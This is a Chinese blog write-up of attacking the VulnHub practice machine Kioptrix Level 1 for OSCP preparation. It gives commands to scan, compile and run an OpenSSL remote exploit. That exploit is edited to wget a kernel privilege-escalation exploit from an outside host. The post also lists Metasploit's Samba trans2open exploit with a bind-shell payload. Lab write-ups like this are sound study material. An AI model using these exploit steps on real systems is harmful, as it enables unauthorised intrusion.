oscp——Kioptrix: Level 1 (#1)

0x00 前言

这个是第十七台机子了,网上说这个机子是非常简单的,所以来试验一下

链接

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

0x01 信息收集

1.IP

在这里插入图片描述

2.端口

在这里插入图片描述

0x02 攻击

1.端口

这里可以看到80端口开放了OpenSSL
使用nikto进行扫描(我记得oscp考试貌似不让使用工具)

nikto -host 192.168.25.188
在这里插入图片描述
找到了一个rce,然后search一下
在这里插入图片描述
这里我们选用764,然后 -m 进行下载,编译出现了问题
在这里插入图片描述
使用命令apt-get install libssl1.0-dev进行安装
在这里插入图片描述
按照网上的讲解,来进行修改
首先添加两个头
在这里插入图片描述
然后找到#define COMMAND2的位置进行修改wget的内容,因为wget的网站已经挂了
https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c;
在这里插入图片描述
然后再961行的地方将unsigned char *p, *end;修改为const unsigned char *p, *end;

最后:
gcc 764.c -o att -lcrypto,运行之后即可选择0x6b
在这里插入图片描述
运行./att 0x6b 192.168.25.188 -c 40
在这里插入图片描述
还开放了139端口,是samba的端口,之前做过类似的。
enum4linux进行一个扫描,但是我这边的扫描的结果没有显示版本

看了网上说是2.28的洞,这里简单的记录一下

use exploit/linux/samba/trans2open
set PAYLOAD linux/x86/shell_bind_tcp
set rhost 192.168.25.188
run

在这里插入图片描述

0x03 总结

感觉稍微难一点的机子作的多了,这种直接用漏洞提权的反而不习惯了。

  • Apache OpenSSL的洞
  • Saber的洞
已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页